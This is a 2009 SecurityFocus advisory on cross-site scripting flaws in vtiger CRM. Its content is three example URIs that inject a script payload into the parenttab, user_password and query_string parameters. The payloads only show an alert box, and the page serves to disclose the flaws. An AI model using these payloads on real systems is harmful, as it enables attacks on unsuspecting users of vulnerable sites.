Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

vtiger CRM Multiple Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues by enticing an unsuspecting victim to follow malicious URIs.

The following example URIs are available:

http://www.example.com/vtigercrm/index.php?module=Products&action=index&parenttab="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Users&action=Authenticate&user_password="><script>alert(1);</script>
http://www.example.com/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="><script>alert(1);</script>







 

Privacy Statement
Copyright 2009, SecurityFocus